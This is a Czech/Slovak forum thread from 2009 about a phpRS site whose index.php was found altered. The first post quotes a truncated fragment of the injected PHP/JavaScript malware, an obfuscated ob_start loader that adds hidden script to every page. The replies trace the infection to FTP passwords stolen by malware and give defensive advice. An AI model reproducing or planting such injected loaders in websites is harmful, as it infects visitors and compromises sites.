phpRS 2.8.x : phpRS Fórum
Toto fórum je určené výhradně k diskuzi o verzích phpRS v2.8.x.
phpRS - redakční a informační systém
Zmena v index.php
Zaslán uživatelem/kou: Hetleke (IP adresa zaznamenána)
Datum: 2009-05-17, 17:40

v súbore index.php sa mi na začiatku záhadne objavil vložil tento kód:
/*eaca6a4216926d9fbce7adf6d581a604*/ob_start( create_function( '$buf', 'return str_repeat("\t",rand(28,40)).\'<script language=javascript>axrzcdlnc="yK&LS#uIxvkvgPVO%tozTXVOh";nbzdazge="<s!63ri!70t l!61n!67uag!65!3d!6a!61!76!61!73cr!69!70t>


stalo sa to už niekomu, jedná sa o napadnutie phpRS?


EDIT (pa3k): kód som skrátil, niektoré AV označovali stránku kvôli zdrojáku ako zavírenú



Celkem upraveno 5×. Poslední úprava pa3k v 25.05.2009 18:27.

Re: Zmena v index.php
Zaslán uživatelem/kou: MirekS (IP adresa zaznamenána)
Datum: 2009-05-17, 20:44

neni to napadnuti phpRS, ale zneuziti hesla k ftp a zmene souboru pres ftp - vir (napr [http://www.symantec.com/security_response/writeup.jsp?docid=2008-051214-2527-99&tabid=2] [http://www.symantec.com/security_response/writeup.jsp?docid=2005-120112-4018-99] ) ve vasem PC "ukradne" ulozene udaje o ftp z TotalCommanderu a nasledne je pak pouzije k modifikaci stranek

vice napr zde
[http://www.viry.cz/forum/viewtopic.php?f=13&t=81838]
[http://www.lupa.cz/clanky/googlem-ukradena-hesla/]
[http://www.lupa.cz/clanky/web-ktery-se-neubranil-phishingu/]

Re: Zmena v index.php
Zaslán uživatelem/kou: Hetleke (IP adresa zaznamenána)
Datum: 2009-05-18, 16:01

Takže na vine je TotalComander.
Vďaka MirekS.

Re: Zmena v index.php
Zaslán uživatelem/kou: MirekS (IP adresa zaznamenána)
Datum: 2009-05-18, 18:24

ne, na vině je uživatel, který se klidně nechá zavirovat a pak si ještě ukládá hesla pro ftp, která mu ten vir pak snadno zcizí (nejedná se jen o Total Commander ale i další podobné programy)

Re: Zmena v index.php
Zaslán uživatelem/kou: Hetleke (IP adresa zaznamenána)
Datum: 2009-05-19, 07:29

Nooo, pravidelne kontrolujem comp. Oficiálne mám NOD, ktorý sa pravidelne aktualizuje. Okrem toho používam Spybot, a Ad-Aware. Takže neviem ako sa mi ten vir dostal do kompu. Lebo žiadna ochrana ho nehlásila.
Spravil som hĺbkový test ....



Celkem upraveno 1×. Poslední úprava Hetleke v 19.05.2009 15:42.

Re: Zmena v index.php
Zaslán uživatelem/kou: pa3k (IP adresa zaznamenána)
Datum: 2009-05-19, 15:54

Hetleke napísal/a:
-------------------------------------------------------
> Nooo, pravidelne kontrolujem comp. Oficiálne mám
> NOD, ktorý sa pravidelne aktualizuje. Okrem toho
> používam Spybot, a Ad-Aware. Takže neviem ako sa
> mi ten vir dostal do kompu. Lebo žiadna ochrana ho
> nehlásila.
> Spravil som hĺbkový test ....
>
>
>
> Celkovo upravené 1×. Posledná úprava: Hetleke dňa
> 19.05. - 15:42.


Heslo mohlo utiecť niekomu inému, kto ho má v TC. AK heslo nikto iný nemá, je možné, že nejaký malware prešiel cez neopravenú säčasť OS alebo iného nainštalovaného SW a v čase keď sa to stalo, daný AV ešte nevedel zareagovať. Najčastejsie využívané diery sú z mojich skúseností v aplikáciách Adobe Acrobat Reader a v samotnom OS ak nie je záplatovaný. Nakoniec ale môže byť chyba aj na strane serveru, útok nemusel byť vedený cez FTP ale priamo z OS kde beží hosting.

Re: Zmena v index.php
Zaslán uživatelem/kou: Hetleke (IP adresa zaznamenána)
Datum: 2009-05-22, 06:37

Comp mám čistý (aspoň si to myslím), a heslo nikto iný nevie. Os mám pravidelne zaplátovaný, lebo ho mám samozrejme oficiálne. Takže mám podozrenie na forpsi, kde hosťujem...., alebo acrobat reader, ktorý používam.
Teraz to pravidelne kontrolujem a je to v pohode.

Re: Zmena v index.php
Zaslán uživatelem/kou: MirekS (IP adresa zaznamenána)
Datum: 2009-05-22, 08:36

Přesvědčit se o nezavirovaném PC se dá jedině tak, že se z něj vyndá pevný disk, který se dá do jiného PC, o kterém vím, že zavirováno není, a v něm ten disk zkontroluji. Je to z toho důvodu, že řada virů dokáže většinu nejznámějších antivirů zablokovat nebo "oblbnout", aby je nedokázaly najít.
Forpsi bych opravdu nepodeziral, nebot v soucasne dobe je opravdu hojne vyuizivano to zcizeni prihlasovacich udaju k ftp z PC "webmastera", pripadne jeste jsou viry, ktere primo v PC napadnou html stranky a ty si tam ten webmaster pak sam pres to ftp (nebo i jinym zpusobem) nakopiruje.

Re: Zmena v index.php
Zaslán uživatelem/kou: Hetleke (IP adresa zaznamenána)
Datum: 2009-05-29, 07:02

Total comander som používal dosť starú portable verziu.
Zatiaľ sa to neopakuje.



Lituji, ale pouze registrovaní uživatelé mohou zasílat příspěvky do této sekce.
This forum powered by Phorum and designed by STaNBoSS.